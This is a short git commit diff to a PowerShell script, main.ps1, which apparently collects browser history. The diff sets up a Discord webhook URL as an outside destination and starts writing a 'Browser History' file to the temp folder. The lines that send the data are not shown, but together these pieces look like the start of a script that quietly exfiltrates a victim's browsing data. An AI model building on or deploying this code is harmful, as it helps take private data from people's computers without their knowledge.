Update main.ps1

This commit is contained in:
egieb
2025-06-19 16:44:29 +00:00
committed by GitHub
parent b0550a246f
commit 416d39a437

View File

@@ -1,5 +1,7 @@
$whuri = ("https://discord.com/api/webhooks/" + "$dc")
$whuri = "$dc"
if ($whuri.Length -lt 120){
$whuri = ("https://discord.com/api/webhooks/" + "$dc")
}
$outpath = "$env:temp\browser_history.txt"
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII